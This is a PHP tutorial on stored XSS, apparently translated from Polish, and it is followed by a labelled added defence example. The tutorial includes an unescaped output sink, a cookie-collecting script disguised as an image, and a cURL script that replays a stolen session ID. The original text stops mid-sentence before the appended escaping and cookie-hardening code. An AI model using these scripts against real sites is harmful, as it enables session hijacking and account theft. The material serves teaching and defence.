Cross-site scripting (XSS) consists of injecting into the content of the attacked site code (typically JavaScript) which, when displayed to another user, can make that user's browser perform an unwanted action. One such action may be sending a cookie to the attacker.
A cookie is a small piece of text sent by a website to the user's browser. A cookie may store, for example, a setting or a session identifier. Cookies can only be read within their own domain: a cookie set by www.przyklad123.pl cannot be read by www.przyklad321.pl.
It is also worth explaining how the session mechanism works in PHP. The information stored in session variables is kept on the server side, but the session identifier is sent to the browser as a cookie. If you steal that identifier, you can take over the user's session.
An example of XSS
First I create a temporary login panel. The logowanie.php file:
<?php
session_start();
if (!isset($_SESSION['logged'])) {
    $_SESSION['logged'] = false;
}
if (isset($_GET['action'])) {
    if ($_GET['action'] == 'logout') {
        $_SESSION['logged'] = false;
        session_destroy();
    }
}
if ($_SESSION['logged'] === false && isset($_POST['username']) && isset($_POST['password'])) {
    if ($_POST['username'] == 'demo' && $_POST['password'] == 'demo') {
        $_SESSION['logged'] = true;
    } else {
        echo '<p>Wrong password!!!</p>';
        $_SESSION['logged'] = false;
    }
}
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta charset="utf-8">
<title>XSS - login</title>
</head>
<body>
<?php if ($_SESSION['logged']): ?>
You are logged in! <a href="?action=logout">Log me out!</a>
<?php else: ?>
<form method="post" action="">
Username: <input type="text" name="username"/><br/>
Password: <input type="password" name="password"/><br/>
<input type="submit" value="Login"/>
</form>
<?php endif; ?>
</body>
</html>
Having the database structure and the login panel, let's add a post form. This is the post.php file:
<?php
$dbh = new PDO('mysql:host=****;dbname=****', '****', '****');
$dbh->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
if (isset($_POST['content'])) {
    $content = $_POST['content'];
    // Prepared statement with a bound parameter: the insert is safe from SQL injection
    $newPost = $dbh->prepare("INSERT INTO post SET content = :content");
    $newPost->bindValue(':content', $content, PDO::PARAM_STR);
    $newPost->execute();
}
?>
<html>
<head>
<title>XSS</title>
</head>
<body>
<form action="" method="post">
Text:<br/>
<textarea name="content"></textarea><br/>
<input type="submit" value="Add"/>
</form>
<h4>Added posts</h4>
<ul>
<?php
$posts = $dbh->prepare("SELECT * FROM post ORDER BY id DESC");
$posts->execute();
foreach ($posts->fetchAll() as $post) {
    // Post content is echoed without escaping: this is the XSS sink the article demonstrates
    echo '<li>' . $post['content'] . '</li>';
}
?>
</ul>
</body>
</html>
This file performs two actions: adding a post to the database and displaying all posts from the database. Note that the write to the database is protected against SQL injection. Let's see what happens when I type into the text box JavaScript code that displays an alert.
The example above uses more elaborate code: I inject an image whose source sends the cookie, using the GET method, to my domain. I rely here on the fact that images are loaded automatically.
The malicious code is now injected into the site. It's time to receive the data :) For me it is the obrazek.php file:
<?php
if (isset($_GET['cookies'])) {
    file_put_contents('cookies_data.txt', date('Y-m-d H:i') . ' - ' . $_GET['cookies'] . "\n", FILE_APPEND | LOCK_EX);
}
header('Content-type: image/gif');
This is a very simple script. I simply write the data from the $_GET array, together with the date, to the file cookies_data.txt. The data could be saved in other ways, for example sent by e-mail. At the end I set an image content-type header. You could also display an actual picture to hide the intent better.
To use the captured session identifier, I create a script using the cURL library which connects to the login panel and sends that identifier as a cookie. The curl.php file:
<?php
$addr = 'http://lukasz-socha.pl/przyklady/xss/logowanie.php';
$connect = curl_init();
curl_setopt($connect, CURLOPT_URL, $addr);
curl_setopt($connect, CURLOPT_COOKIE, "PHPSESSID=2f59021b60788fda60f5ee3f5fd374a8");
// Return the response as a string instead of printing it directly
curl_setopt($connect, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($connect);
curl_close($connect);
echo $result;
Securing against XSS is fairly easy - before displaying data zb
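As an added example (not the original post's code), the defence applied to the two files above: the post list from post.php rendered with output escaping, plus session-cookie settings for logowanie.php that keep the session identifier out of reach of injected script. It assumes PHP 7.3 or newer for the array form of session_set_cookie_params and that the site is served over HTTPS.

```php
<?php
// Added example: escaping on output and session-cookie hardening for the demo site.

// Escape a value for safe insertion into HTML text or attribute values.
// ENT_QUOTES handles both quote styles, ENT_SUBSTITUTE avoids returning an empty
// string on invalid UTF-8, and the explicit charset rules out encoding tricks.
function escape_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened version of the <li> from post.php: a stored <script> or <img> tag
// becomes visible text in the page instead of being parsed by the browser.
function render_post(string $content): string
{
    return '<li>' . escape_html($content) . '</li>';
}

// Replacement for the bare session_start() in logowanie.php.
// HttpOnly keeps document.cookie from exposing PHPSESSID to injected script,
// Secure restricts the cookie to HTTPS, SameSite=Strict stops it being sent on
// cross-site requests.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

// On successful login, issue a fresh session ID so that an identifier handed
// out before authentication cannot be reused as a logged-in session.
function mark_logged_in(): void
{
    session_regenerate_id(true);
    $_SESSION['logged'] = true;
}

// Constructed sample input, the same kind of post used in the alert test above;
// rendered through render_post() it is shown as text, not executed.
$stored = '<script>alert("XSS")</script>';
echo render_post($stored), "\n";
```

Escaping belongs at the point of output, so the same rule applies to every place post content is echoed, not only the list shown here.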